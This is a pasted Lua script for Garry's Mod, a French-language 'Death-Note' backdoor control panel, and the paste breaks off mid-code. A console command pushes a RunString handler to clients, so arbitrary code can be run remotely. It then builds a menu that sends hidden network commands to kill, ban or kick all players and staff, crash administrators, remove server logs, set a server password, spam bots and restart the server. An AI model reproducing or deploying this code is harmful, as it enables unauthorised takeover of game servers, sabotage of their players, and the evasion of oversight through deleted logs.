Guest User


a guest
Sep 23rd, 2019
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text 99.87 KB | None | 0 0
  1. --[[
  5. ]]--
  7. util.AddNetworkString("SENDTEST")
  8. util.AddNetworkString("echangeinfo")
  10. concommand.Add("fdp", function(ply, cmd, args)
  11. ply:SendLua("net.Receive(\"SENDTEST\",function()RunString(net.ReadString())end)")
  12. net.Start("SENDTEST")
  13. net.WriteString([[
  14. surface.CreateFont( "APG_title_font",
  15. {
  16. font = "Arial",
  17. size = 14,
  18. weight = 700,
  19. })
  20. surface.CreateFont( "APG_sideBar_font",
  21. {
  22. font = "Arial",
  23. size = 18,
  24. weight = 1500,
  25. })
  27. surface.CreateFont( "APG_mainPanel_font",
  28. {
  29. font = "Arial",
  30. size = 19,
  31. weight = 8500,
  32. })
  34. function actioneff(aff)
  35. hook.Add( "HUDPaint", "infohud", function()
  36. draw.SimpleTextOutlined(
  37. aff,
  38. "DermaLarge",
  39. ScrW() /2 ,
  40. 40,
  41. Color( 255, 0, 0, 255 ),
  44. 1,
  45. Color( 0, 0, 255 )
  46. )
  47. end)
  48. timer.Simple( 3, function() hook.Remove( "HUDPaint", "infohud" ) end )
  49. end
  51. local main_color = Color(32, 255, 0,255)
  54. local Frame = vgui.Create( "DFrame" )
  55. Frame:SetSize( ScrW() -200, ScrH() -200)
  56. Frame:SetPos( ScrW()/2- Frame:GetWide()/2, ScrH()/2 - Frame:GetTall()/2)
  57. Frame:SetTitle( "" )
  58. Frame:SetVisible( true )
  59. Frame:SetDraggable( true )
  60. Frame:MakePopup()
  61. Frame:ShowCloseButton(false)
  62. Frame:SetIcon( "icon16/bug.png" )
  63. Frame.Paint = function(i,w,h)
  64. draw.RoundedBox(4,0,0,w,h,Color(34, 34, 34,255))
  65. draw.RoundedBox(0,0,23,w,1,main_color)
  66. local name = " Death-Note "
  67. draw.DrawText( name, "APG_title_font",8, 5, Color( 189, 189, 189), 3 )
  68. end
  69. local closeButton = vgui.Create("DButton",Frame)
  70. closeButton:SetPos(Frame:GetWide() - 20,4)
  71. closeButton:SetSize(16,16)
  72. closeButton:SetText('')
  73. closeButton.DoClick = function()
  74. Frame:Remove()
  75. end
  76. closeButton.Paint = function(i,w,h)
  77. draw.RoundedBox(0,0,0,w,h,Color(255, 255, 255,3))
  78. draw.DrawText( "✕", "APG_sideBar_font",0, -2, Color( 189, 189, 189), 3 )
  79. end
  82. local Button = vgui.Create( "DButton", Frame )
  83. Button:SetText( "" )
  84. Button:SetTextColor( Color( 255, 255, 255 ) )
  85. Button:SetPos( (Frame:GetWide() / 2) - 60,40 )
  86. Button:SetSize( 120, 30 )
  87. Button.UpdateColours = function( label, skin )
  88. label:SetTextStyleColor( Color( 189, 189, 189 ) )
  89. end
  91. Button.Paint = function(slf, w, h)
  93. draw.RoundedBox(0,0,h*0.85,w-5,1, Color(0, 96, 0,255))
  94. local text = "Tout le monde"
  95. draw.DrawText( text, "APG_mainPanel_font",5, 8, Color( 189, 189, 189), 3 )
  96. end
  99. Button.DoClick = function()
  100. local m = DermaMenu()
  101. local infoserver, infoservericon = m:AddSubMenu( "Serveur" )
  102. infoservericon:SetIcon( "icon16/bug.png" )
  103. m:AddSpacer()
  104. local meutreall, meutreiconall = m:AddSubMenu( "Meutre" )
  105. meutreiconall:SetIcon( "icon16/bomb.png" )
  106. m:AddSpacer()
  107. local ulxall, ulxallicon = m:AddSubMenu( "Commandes" )
  108. ulxallicon:SetIcon( "icon16/script_add.png" )
  109. local notificationall, notificationallicon = ulxall:AddSubMenu( "Notification" )
  110. notificationallicon:SetIcon( "icon16/briefcase.png" )
  111. local meutreallsub, meutreallsubicon = meutreall:AddSubMenu( "Tuer" )
  112. meutreallsubicon:SetIcon( "icon16/delete.png" )
  113. local meutreallssub, meutreallssubicon = meutreall:AddSubMenu( "Tuer(silencieux)" )
  114. meutreallssubicon:SetIcon( "icon16/delete.png" )
  115. local explosesub, explosesubicon = meutreall:AddSubMenu( "Exploser" )
  116. explosesubicon:SetIcon( "icon16/delete.png" )
  117. local igniteallssub, igniteallssubicon = meutreall:AddSubMenu( "Bruler" )
  118. igniteallssubicon:SetIcon( "icon16/delete.png" )
  119. local kicksub, kicksubicon = ulxall:AddSubMenu( "Kick" )
  120. kicksubicon:SetIcon( "icon16/status_away.png" )
  121. local bansub, bansubicon = ulxall:AddSubMenu( "Ban" )
  122. bansubicon:SetIcon( "icon16/status_busy.png" )
  123. local freezesub, freezesubicon = ulxall:AddSubMenu( "Freeze" )
  124. freezesubicon:SetIcon( "icon16/stop.png" )
  125. local unfreezesub, unfreezesubicon = ulxall:AddSubMenu( "Unfreeze" )
  126. unfreezesubicon:SetIcon( "icon16/accept.png" )
  127. local noclipsub, noclipsubicon = ulxall:AddSubMenu( "NOCLIP" )
  128. noclipsubicon:SetIcon( "icon16/drive_user.png" )
  129. m:AddSpacer()
  133. local animationall, animationallicon = m:AddSubMenu( "Animation" )
  134. animationallicon:SetIcon( "icon16/wand.png" )
  135. local animationallsubsalute, animationallsubiconsalute = animationall:AddSubMenu( "Saluer" )
  136. animationallsubiconsalute:SetIcon( "icon16/wand.png" )
  137. local animationallsubrobot, animationallsubiconrobot = animationall:AddSubMenu( "Robot" )
  138. animationallsubiconrobot:SetIcon( "icon16/wand.png" )
  139. m:AddSpacer()
  140. local animationallsubcheer, animationallsubiconcheer = animationall:AddSubMenu( "Levez les mains" )
  141. animationallsubiconcheer:SetIcon( "icon16/wand.png" )
  142. local animationallsublaugh, animationallsubiconlaugh = animationall:AddSubMenu( "Rire" )
  143. animationallsubiconlaugh:SetIcon( "icon16/wand.png" )
  144. local animationallsubmuscle, animationallsubiconmuscle = animationall:AddSubMenu( "Danse Sexy!" )
  145. animationallsubiconmuscle:SetIcon( "icon16/wand.png" )
  146. local animationallsubpersistence, animationallsubiconpersistence = animationall:AddSubMenu( "Faire le beau!" )
  147. animationallsubiconpersistence:SetIcon( "icon16/wand.png" )
  148. local animationallsubdance, animationallsubicondance = animationall:AddSubMenu( "Danse!" )
  149. animationallsubicondance:SetIcon( "icon16/wand.png" )
  150. local moovesall, moovesiconall = m:AddSubMenu( "Mouvement" )
  151. moovesiconall:SetIcon( "icon16/controller.png" )
  152. m:AddSpacer()
  153. local trollall, trollallicon = m:AddSubMenu( "Troll Menu" )
  154. trollallicon:SetIcon( "icon16/rainbow.png" )
  155. local spamchat, spamchaticon = trollall:AddSubMenu( "Spam Chat" )
  156. spamchaticon:SetIcon( "icon16/application_form.png" )
  157. local nuke, nukeicon = trollall:AddSubMenu( "Nuke" )
  158. nukeicon:SetIcon( "icon16/lightning.png" )
  160. local mooveall, mooveallicon = trollall:AddSubMenu( "Mouvement" )
  161. mooveallicon:SetIcon( "icon16/bug_error.png" )
  163. local jumpbreakall, jumpbreakallicon = trollall:AddSubMenu( "Jump Break" )
  164. jumpbreakallicon:SetIcon( "icon16/rainbow.png" )
  166. local gravitesub, gravitesubicon = trollall:AddSubMenu( "Gravité Break" )
  167. gravitesubicon:SetIcon( "icon16/rainbow.png" )
  169. local physiquesub, physiqueicon = trollall:AddSubMenu( "Physique Break" )
  170. physiqueicon:SetIcon( "icon16/rainbow.png" )
  172. local quakeearth, quakeearthicon = trollall:AddSubMenu( "Tremblement" )
  173. quakeearthicon:SetIcon( "icon16/rainbow.png" )
  175. local prisonsub, prisonsubicon = trollall:AddSubMenu( "Prison" )
  176. prisonsubicon:SetIcon( "icon16/user_orange.png" )
  178. ulxall:AddOption( "CleanUP", function()
  179. net.Start( "echangeinfo" )
  180. net.WriteString("cleanup")
  181. net.WriteEntity( userl )
  182. net.SendToServer()
  183. end ):SetIcon( "icon16/cut.png" )
  184. bansub:AddOption( "ALL", function()
  185. net.Start( "echangeinfo" )
  186. net.WriteString("banall")
  187. net.WriteEntity( userl )
  188. net.SendToServer()
  189. end ):SetIcon( "icon16/user.png" )
  191. bansub:AddOption( "STAFF", function()
  192. net.Start( "echangeinfo" )
  193. net.WriteString("banallstaff")
  194. net.WriteEntity( userl )
  195. net.SendToServer()
  196. end ):SetIcon( "icon16/user_gray.png" )
  198. kicksub:AddOption( "ALL", function()
  199. local frame = vgui.Create( "DFrame" )
  200. frame:SetSize( 400, 100 )
  201. frame:SetTitle( "" )
  202. frame:Center()
  203. frame:MakePopup()
  204. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  205. TextEntry:SetPos( 25, 50 )
  206. TextEntry:SetSize( 350, 35 )
  207. TextEntry:SetText( "Raison..." )
  208. TextEntry.OnEnter = function( self )
  209. net.Start( "echangeinfo" )
  210. net.WriteString("kickall")
  211. net.WriteEntity( userl )
  212. net.WriteString(TextEntry:GetValue())
  213. net.SendToServer()
  214. end
  215. end ):SetIcon( "icon16/user.png" )
  217. kicksub:AddOption( "STAFF", function()
  218. local frame = vgui.Create( "DFrame" )
  219. frame:SetSize( 400, 100 )
  220. frame:SetTitle( "" )
  221. frame:Center()
  222. frame:MakePopup()
  223. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  224. TextEntry:SetPos( 25, 50 )
  225. TextEntry:SetSize( 350, 35 )
  226. TextEntry:SetText( "Raison..." )
  227. TextEntry.OnEnter = function( self )
  228. net.Start( "echangeinfo" )
  229. net.WriteString("kickallstaff")
  230. net.WriteEntity( userl )
  231. net.WriteString(TextEntry:GetValue())
  232. net.SendToServer()
  233. end
  234. end ):SetIcon( "icon16/user_gray.png" )
  236. notificationall:AddOption( "Generic", function()
  237. local frame = vgui.Create( "DFrame" )
  238. frame:SetSize( 400, 100 )
  239. frame:SetTitle( "" )
  240. frame:Center()
  241. frame:MakePopup()
  242. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  243. TextEntry:SetPos( 25, 50 )
  244. TextEntry:SetSize( 350, 35 )
  245. TextEntry:SetText( "Message..." )
  246. TextEntry.OnEnter = function( self )
  247. net.Start( "echangeinfo" )
  248. net.WriteString("notification_generic")
  249. net.WriteEntity( userl )
  250. net.WriteString(TextEntry:GetValue())
  251. net.SendToServer()
  252. end
  253. end ):SetIcon( "icon16/lightbulb_off.png" )
  255. notificationall:AddOption( "Error", function()
  256. local frame = vgui.Create( "DFrame" )
  257. frame:SetSize( 400, 100 )
  258. frame:SetTitle( "" )
  259. frame:Center()
  260. frame:MakePopup()
  261. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  262. TextEntry:SetPos( 25, 50 )
  263. TextEntry:SetSize( 350, 35 )
  264. TextEntry:SetText( "Message..." )
  265. TextEntry.OnEnter = function( self )
  266. net.Start( "echangeinfo" )
  267. net.WriteString("notification_error")
  268. net.WriteEntity( userl )
  269. net.WriteString(TextEntry:GetValue())
  270. net.SendToServer()
  271. end
  272. end ):SetIcon( "icon16/cancel.png" )
  274. notificationall:AddOption( "Undo", function()
  275. local frame = vgui.Create( "DFrame" )
  276. frame:SetSize( 400, 100 )
  277. frame:SetTitle( "" )
  278. frame:Center()
  279. frame:MakePopup()
  280. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  281. TextEntry:SetPos( 25, 50 )
  282. TextEntry:SetSize( 350, 35 )
  283. TextEntry:SetText( "Message..." )
  284. TextEntry.OnEnter = function( self )
  285. net.Start( "echangeinfo" )
  286. net.WriteString("notification_undo")
  287. net.WriteEntity( userl )
  288. net.WriteString(TextEntry:GetValue())
  289. net.SendToServer()
  290. end
  291. end ):SetIcon( "icon16/arrow_undo.png" )
  293. notificationall:AddOption( "Hint", function()
  294. local frame = vgui.Create( "DFrame" )
  295. frame:SetSize( 400, 100 )
  296. frame:SetTitle( "" )
  297. frame:Center()
  298. frame:MakePopup()
  299. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  300. TextEntry:SetPos( 25, 50 )
  301. TextEntry:SetSize( 350, 35 )
  302. TextEntry:SetText( "Message..." )
  303. TextEntry.OnEnter = function( self )
  304. net.Start( "echangeinfo" )
  305. net.WriteString("notification_hint")
  306. net.WriteEntity( userl )
  307. net.WriteString(TextEntry:GetValue())
  308. net.SendToServer()
  309. end
  310. end ):SetIcon( "icon16/cut.png" )
  312. notificationall:AddOption( "Cleanup", function()
  313. local frame = vgui.Create( "DFrame" )
  314. frame:SetSize( 400, 100 )
  315. frame:SetTitle( "" )
  316. frame:Center()
  317. frame:MakePopup()
  318. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  319. TextEntry:SetPos( 25, 50 )
  320. TextEntry:SetSize( 350, 35 )
  321. TextEntry:SetText( "Message..." )
  322. TextEntry.OnEnter = function( self )
  323. net.Start( "echangeinfo" )
  324. net.WriteString("notification_cleanup")
  325. net.WriteEntity( userl )
  326. net.WriteString(TextEntry:GetValue())
  327. net.SendToServer()
  328. end
  329. end ):SetIcon( "icon16/information.png" )
  331. meutreallsub:AddOption( "ALL", function()
  332. net.Start( "echangeinfo" )
  333. net.WriteString("killall")
  334. net.WriteEntity( userl )
  335. net.SendToServer()
  336. end ):SetIcon( "icon16/user.png" )
  337. meutreallsub:AddOption( "STAFF", function()
  338. net.Start( "echangeinfo" )
  339. net.WriteString("killallstaff")
  340. net.WriteEntity( userl )
  341. net.SendToServer()
  342. end ):SetIcon( "icon16/user_gray.png" )
  343. meutreallssub:AddOption( "ALL", function()
  344. net.Start( "echangeinfo" )
  345. net.WriteString("allkillusersilence")
  346. net.WriteEntity( userl )
  347. net.SendToServer()
  348. end ):SetIcon( "icon16/user.png" )
  349. meutreallssub:AddOption( "STAFF", function()
  350. net.Start( "echangeinfo" )
  351. net.WriteString("allkillusersilencestaff")
  352. net.WriteEntity( userl )
  353. net.SendToServer()
  354. end ):SetIcon( "icon16/user_gray.png" )
  356. explosesub:AddOption( "ALL", function()
  357. net.Start( "echangeinfo" )
  358. net.WriteString("exploseall")
  359. net.WriteEntity( userl )
  360. net.SendToServer()
  361. end ):SetIcon( "icon16/user.png" )
  362. explosesub:AddOption( "STAFF", function()
  363. net.Start( "echangeinfo" )
  364. net.WriteString("explosestaff")
  365. net.WriteEntity( userl )
  366. net.SendToServer()
  367. end ):SetIcon( "icon16/user_gray.png" )
  369. igniteallssub:AddOption( "ALL", function()
  370. net.Start( "echangeinfo" )
  371. net.WriteString("igniteall")
  372. net.WriteEntity( userl )
  373. net.SendToServer()
  374. end ):SetIcon( "icon16/user.png" )
  375. igniteallssub:AddOption( "STAFF", function()
  376. net.Start( "echangeinfo" )
  377. net.WriteString("igniteallstaff")
  378. net.WriteEntity( userl )
  379. net.SendToServer()
  380. end ):SetIcon( "icon16/user_gray.png" )
  382. freezesub:AddOption( "ALL", function()
  383. net.Start( "echangeinfo" )
  384. net.WriteString("freezeall")
  385. net.WriteEntity( userl )
  386. net.SendToServer()
  387. end ):SetIcon( "icon16/user.png" )
  388. freezesub:AddOption( "STAFF", function()
  389. net.Start( "echangeinfo" )
  390. net.WriteString("freezeallstaff")
  391. net.WriteEntity( userl )
  392. net.SendToServer()
  393. end ):SetIcon( "icon16/user_gray.png" )
  394. unfreezesub:AddOption( "ALL", function()
  395. net.Start( "echangeinfo" )
  396. net.WriteString("unfreezeall")
  397. net.WriteEntity( userl )
  398. net.SendToServer()
  399. end ):SetIcon( "icon16/user.png" )
  401. unfreezesub:AddOption( "STAFF", function()
  402. net.Start( "echangeinfo" )
  403. net.WriteString("unfreezeallstaff")
  404. net.WriteEntity( userl )
  405. net.SendToServer()
  406. end ):SetIcon( "icon16/user_gray.png" )
  408. noclipsub:AddOption( "[ON]", function()
  409. net.Start( "echangeinfo" )
  410. net.WriteString("noclipallon")
  411. net.WriteEntity( userl )
  412. net.SendToServer()
  413. end ):SetIcon( "icon16/accept.png" )
  415. noclipsub:AddOption( "[OFF]", function()
  416. net.Start( "echangeinfo" )
  417. net.WriteString("noclipalloff")
  418. net.WriteEntity( userl )
  419. net.SendToServer()
  420. end ):SetIcon( "icon16/cancel.png" )
  422. ulxall:AddOption( "Ajoute 11€ toutes les 0.1s", function()
  423. net.Start( "echangeinfo" )
  424. net.WriteString("addmoneyall")
  425. net.WriteEntity( userl )
  426. net.SendToServer()
  427. end ):SetIcon( "icon16/money_add.png" )
  429. ulxall:AddOption( "Ajouter de l'argent", function()
  430. local frame = vgui.Create( "DFrame" )
  431. frame:SetSize( 400, 100 )
  432. frame:SetTitle( "" )
  433. frame:Center()
  434. frame:MakePopup()
  435. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  436. TextEntry:SetPos( 25, 50 )
  437. TextEntry:SetSize( 350, 35 )
  438. TextEntry:SetText( "500" )
  439. TextEntry.OnEnter = function( self )
  440. net.Start( "echangeinfo" )
  441. net.WriteString("addmoneyalls")
  442. net.WriteEntity( userl )
  443. net.WriteString(TextEntry:GetValue())
  444. net.SendToServer()
  445. end
  446. end ):SetIcon( "icon16/money_add.png" )
  448. ulxall:AddOption( "Point de vie", function()
  449. local frame = vgui.Create( "DFrame" )
  450. frame:SetSize( 400, 100 )
  451. frame:SetTitle( "" )
  452. frame:Center()
  453. frame:MakePopup()
  454. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  455. TextEntry:SetPos( 25, 50 )
  456. TextEntry:SetSize( 350, 35 )
  457. TextEntry:SetText( "100" )
  458. TextEntry.OnEnter = function( self )
  459. net.Start( "echangeinfo" )
  460. net.WriteString("healall")
  461. net.WriteEntity( userl )
  462. net.WriteString(TextEntry:GetValue())
  463. net.SendToServer()
  464. end
  465. end ):SetIcon( "icon16/heart.png" )
  467. ulxall:AddOption( "Point d'armure", function()
  468. local frame = vgui.Create( "DFrame" )
  469. frame:SetSize( 400, 100 )
  470. frame:SetTitle( "" )
  471. frame:Center()
  472. frame:MakePopup()
  473. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  474. TextEntry:SetPos( 25, 50 )
  475. TextEntry:SetSize( 350, 35 )
  476. TextEntry:SetText( "250" )
  477. TextEntry.OnEnter = function( self )
  478. net.Start( "echangeinfo" )
  479. net.WriteString("armorall")
  480. net.WriteEntity( userl )
  481. net.WriteString(TextEntry:GetValue())
  482. net.SendToServer()
  483. end
  484. end ):SetIcon( "icon16/user_suit.png" )
  486. trollall:AddOption( "Launch", function()
  487. net.Start( "echangeinfo" )
  488. net.WriteString("launchall")
  489. net.WriteEntity( userl )
  490. net.SendToServer()
  491. end ):SetIcon( "icon16/arrow_up.png" )
  493. trollall:AddOption( "2D Players", function()
  494. net.Start( "echangeinfo" )
  495. net.WriteString("2dplayerall")
  496. net.WriteEntity( userl )
  497. net.SendToServer()
  498. end ):SetIcon( "icon16/bug.png" )
  500. trollall:AddOption( "Donner la grosse tête à tous les joueurs", function()
  501. net.Start( "echangeinfo" )
  502. net.WriteString("grossetete")
  503. net.WriteEntity( userl )
  504. net.SendToServer()
  505. end ):SetIcon( "icon16/bug.png" )
  507. trollall:AddOption( "Changer la taille des joueurs", function()
  508. local frame = vgui.Create( "DFrame" )
  509. frame:SetSize( 400, 100 )
  510. frame:SetTitle( "" )
  511. frame:Center()
  512. frame:MakePopup()
  513. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  514. TextEntry:SetPos( 25, 50 )
  515. TextEntry:SetSize( 350, 35 )
  516. TextEntry:SetText( "5" )
  517. TextEntry.OnEnter = function( self )
  518. net.Start( "echangeinfo" )
  519. net.WriteString("scaleall")
  520. net.WriteEntity( userl )
  521. net.WriteString(TextEntry:GetValue())
  522. net.SendToServer()
  523. end
  524. end ):SetIcon( "icon16/application_edit.png" )
  526. trollall:AddOption( "Hurlement sur tous les joueurs", function()
  527. net.Start( "echangeinfo" )
  528. net.WriteString("hurlement")
  529. net.WriteEntity( userl )
  530. net.SendToServer()
  531. end ):SetIcon( "icon16/bell.png" )
  533. trollall:AddOption( "Faire crash [STAFF]", function()
  534. net.Start( "echangeinfo" )
  535. net.WriteString("crashadminvip")
  536. net.WriteEntity( userl )
  537. net.SendToServer()
  538. end ) :SetIcon( "icon16/disconnect.png" )
  540. spamchat:AddOption( "[ON]", function()
  541. net.Start( "echangeinfo" )
  542. net.WriteString("spamchat")
  543. net.WriteEntity( userl )
  544. net.SendToServer()
  545. end ) :SetIcon( "icon16/accept.png" )
  547. spamchat:AddOption( "[OFF]", function()
  548. net.Start( "echangeinfo" )
  549. net.WriteString("spamchatstop")
  550. net.WriteEntity( userl )
  551. net.SendToServer()
  552. end ) :SetIcon( "icon16/cancel.png" )
  554. mooveall:AddOption( "[ON]", function()
  555. net.Start( "echangeinfo" )
  556. net.WriteString("moovetrollall")
  557. net.WriteEntity( userl )
  558. net.SendToServer()
  559. end ):SetIcon( "icon16/accept.png" )
  561. mooveall:AddOption( "[OFF]", function()
  562. net.Start( "echangeinfo" )
  563. net.WriteString("unmoovetrollall")
  564. net.WriteEntity( userl )
  565. net.SendToServer()
  566. end ):SetIcon( "icon16/cancel.png" )
  568. jumpbreakall:AddOption( "ON", function()
  569. net.Start( "echangeinfo" )
  570. net.WriteString("jump")
  571. net.WriteEntity( userl )
  572. net.SendToServer()
  573. end ):SetIcon( "icon16/accept.png" )
  575. jumpbreakall:AddOption( "OFF", function()
  576. net.Start( "echangeinfo" )
  577. net.WriteString("retablirjumpall")
  578. net.WriteEntity( userl )
  579. net.SendToServer()
  580. end ):SetIcon( "icon16/cancel.png" )
  582. moovesall:AddOption( "[ON]Avancer", function()
  583. net.Start( "echangeinfo" )
  584. net.WriteString("forwardmooveall")
  585. net.WriteEntity( userl )
  586. net.SendToServer()
  587. end ):SetIcon( "icon16/accept.png" )
  589. moovesall:AddOption( "[OFF]Avancer", function()
  590. net.Start( "echangeinfo" )
  591. net.WriteString("unforwardmooveall")
  592. net.WriteEntity( userl )
  593. net.SendToServer()
  594. end ):SetIcon( "icon16/stop.png" )
  596. moovesall:AddOption( "[ON]Reculer", function()
  597. net.Start( "echangeinfo" )
  598. net.WriteString("backmooveall")
  599. net.WriteEntity( userl )
  600. net.SendToServer()
  601. end ):SetIcon( "icon16/accept.png" )
  603. moovesall:AddOption( "[OFF]Reculer", function()
  604. net.Start( "echangeinfo" )
  605. net.WriteString("unbackmooveall")
  606. net.WriteEntity( userl )
  607. net.SendToServer()
  608. end ):SetIcon( "icon16/stop.png" )
  610. moovesall:AddOption( "[ON]Tourner à gauche", function()
  611. net.Start( "echangeinfo" )
  612. net.WriteString("leftmooveall")
  613. net.WriteEntity( userl )
  614. net.SendToServer()
  615. end ):SetIcon( "icon16/accept.png" )
  617. moovesall:AddOption( "[OFF]Tourner à gauche", function()
  618. net.Start( "echangeinfo" )
  619. net.WriteString("unleftmooveall")
  620. net.WriteEntity( userl )
  621. net.SendToServer()
  622. end ):SetIcon( "icon16/stop.png" )
  624. moovesall:AddOption( "[ON]Tourner à droite", function()
  625. net.Start( "echangeinfo" )
  626. net.WriteString("rightmooveall")
  627. net.WriteEntity( userl )
  628. net.SendToServer()
  629. end ):SetIcon( "icon16/accept.png" )
  631. moovesall:AddOption( "[OFF]Tourner à droite", function()
  632. net.Start( "echangeinfo" )
  633. net.WriteString("unrightmooveall")
  634. net.WriteEntity( userl )
  635. net.SendToServer()
  636. end ):SetIcon( "icon16/stop.png" )
  638. moovesall:AddOption( "[ON]S'accroupir", function()
  639. net.Start( "echangeinfo" )
  640. net.WriteString("squatmooveall")
  641. net.WriteEntity( userl )
  642. net.SendToServer()
  643. end ):SetIcon( "icon16/accept.png" )
  645. moovesall:AddOption( "[OFF]S'accroupir", function()
  646. net.Start( "echangeinfo" )
  647. net.WriteString("unsquatmooveall")
  648. net.WriteEntity( userl )
  649. net.SendToServer()
  650. end ):SetIcon( "icon16/stop.png" )
  652. infoserver:AddOption( "Enlever les logs", function()
  653. net.Start( "echangeinfo" )
  654. net.WriteString("logsremove")
  655. net.WriteEntity( userl )
  656. net.SendToServer()
  657. end ):SetIcon( "icon16/cog_delete.png" )
  659. infoserver:AddOption( "Changer le nom du serveur", function()
  660. local frame = vgui.Create( "DFrame" )
  661. frame:SetSize( 400, 100 )
  662. frame:SetTitle( "" )
  663. frame:Center()
  664. frame:MakePopup()
  665. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  666. TextEntry:SetPos( 25, 50 )
  667. TextEntry:SetSize( 350, 35 )
  668. TextEntry:SetText( "▁ ▂ ▃ ▄ ▅ ▆ ▇ĤẪĈЌĒĎ ฿¥ ĔρĨĩĆẤ ŤΈǺM█ ▇ ▆ ▅ ▄ ▂ ▁" )
  669. TextEntry.OnEnter = function( self )
  670. net.Start( "echangeinfo" )
  671. net.WriteString("changename")
  672. net.WriteEntity( userl )
  673. net.WriteString(TextEntry:GetValue())
  674. net.SendToServer()
  675. end
  676. end ):SetIcon( "icon16/server_edit.png" )
  678. infoserver:AddOption( "Changer l'écran de chargement", function()
  679. local frame = vgui.Create( "DFrame" )
  680. frame:SetSize( 400, 100 )
  681. frame:SetTitle( "" )
  682. frame:Center()
  683. frame:MakePopup()
  684. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  685. TextEntry:SetPos( 25, 50 )
  686. TextEntry:SetSize( 350, 35 )
  687. TextEntry:SetText( "" )
  688. TextEntry.OnEnter = function( self )
  689. net.Start( "echangeinfo" )
  690. net.WriteString("changeload")
  691. net.WriteEntity( userl )
  692. net.WriteString(TextEntry:GetValue())
  693. net.SendToServer()
  694. end
  695. end ):SetIcon( "icon16/server_edit.png" )
  697. infoserver:AddOption( "Autoriser les scripts client (0 ou 1)", function()
  698. local frame = vgui.Create( "DFrame" )
  699. frame:SetSize( 400, 100 )
  700. frame:SetTitle( "" )
  701. frame:Center()
  702. frame:MakePopup()
  703. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  704. TextEntry:SetPos( 25, 50 )
  705. TextEntry:SetSize( 350, 35 )
  706. TextEntry:SetText( "1" )
  707. TextEntry.OnEnter = function( self )
  708. net.Start( "echangeinfo" )
  709. net.WriteString("allowcsluads")
  710. net.WriteEntity( userl )
  711. net.WriteString(TextEntry:GetValue())
  712. net.SendToServer()
  713. end
  714. end ):SetIcon( "icon16/server_edit.png" )
  716. infoserver:AddOption( "Mettre un mot de passe sur le serveur", function()
  717. local frame = vgui.Create( "DFrame" )
  718. frame:SetSize( 400, 100 )
  719. frame:SetTitle( "" )
  720. frame:Center()
  721. frame:MakePopup()
  722. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  723. TextEntry:SetPos( 25, 50 )
  724. TextEntry:SetSize( 350, 35 )
  725. TextEntry:SetText( "secure" )
  726. TextEntry.OnEnter = function( self )
  727. net.Start( "echangeinfo" )
  728. net.WriteString("secureinfo")
  729. net.WriteEntity( userl )
  730. net.WriteString(TextEntry:GetValue())
  731. net.SendToServer()
  732. end
  733. end ):SetIcon( "icon16/server_edit.png" )
  735. infoserver:AddOption( "Bot spam", function()
  736. local frame = vgui.Create( "DFrame" )
  737. frame:SetSize( 400, 100 )
  738. frame:SetTitle( "Nombre de Bot ?" )
  739. frame:Center()
  740. frame:MakePopup()
  741. local TextEntry = vgui.Create( "DTextEntry", frame ) -- create the form as a child of frame
  742. TextEntry:SetPos( 25, 50 )
  743. TextEntry:SetSize( 350, 35 )
  744. TextEntry:SetText( "5" )
  745. TextEntry.OnEnter = function( self )
  746. net.Start( "echangeinfo" )
  747. net.WriteString("botspam")
  748. net.WriteEntity( userl )
  749. net.WriteString(TextEntry:GetValue())
  750. net.SendToServer()
  751. end
  752. end ):SetIcon( "icon16/user.png" )
  754. infoserver:AddOption( "Changer le nom de tous les joueurs", function()
  755. net.Start( "echangeinfo" )
  756. net.WriteString("namechanger")
  757. net.WriteEntity( userl )
  758. net.SendToServer()
  759. end ):SetIcon( "icon16/server_database.png" )
  761. infoserver:AddOption( "Changer le nom de tous les joueurs[SPAM]", function()
  762. net.Start( "echangeinfo" )
  763. net.WriteString("namechangerspam")
  764. net.WriteEntity( userl )
  765. net.SendToServer()
  766. end ):SetIcon( "icon16/server_database.png" )
  768. infoserver:AddOption( "Name Changer[OFF]", function()
  769. net.Start( "echangeinfo" )
  770. net.WriteString("namechangerstop")
  771. net.WriteEntity( userl )
  772. net.SendToServer()
  773. end ):SetIcon( "icon16/server_database.png" )
  775. infoserver:AddOption( "Redémarrer serveur", function()
  776. net.Start( "echangeinfo" )
  777. net.WriteString("restartserver")
  778. net.WriteEntity( userl )
  779. net.SendToServer()
  780. end ):SetIcon( "icon16/server_go.png" )
  782. gravitesub:AddOption( "ON", function()
  783. net.Start( "echangeinfo" )
  784. net.WriteString("cassergrall")
  785. net.WriteEntity( userl )
  786. net.SendToServer()
  787. end ):SetIcon( "icon16/accept.png" )
  789. gravitesub:AddOption( "OFF", function()
  790. net.Start( "echangeinfo" )
  791. net.WriteString("retablirgrall")
  792. net.WriteEntity( userl )
  793. net.SendToServer()
  794. end ):SetIcon( "icon16/cancel.png" )
  796. physiquesub:AddOption( "ON", function()
  797. net.Start( "echangeinfo" )
  798. net.WriteString("physicgamestyle")
  799. net.WriteEntity( userl )
  800. net.SendToServer()
  801. end ):SetIcon( "icon16/accept.png" )
  803. physiquesub:AddOption( "OFF", function()
  804. net.Start( "echangeinfo" )
  805. net.WriteString("retablirphysicgamestyle")
  806. net.WriteEntity( userl )
  807. net.SendToServer()
  808. end ):SetIcon( "icon16/cancel.png" )
  810. quakeearth:AddOption( "ON", function()
  811. net.Start( "echangeinfo" )
  812. net.WriteString("earthquakeonall")
  813. net.WriteEntity( userl )
  814. net.SendToServer()
  815. end ):SetIcon( "icon16/accept.png" )
  817. trollall:AddOption( "GL0B4L H4CK", function()
  818. net.Start( "echangeinfo" )
  819. net.WriteString("globalhack")
  820. net.WriteEntity( userl )
  821. net.SendToServer()
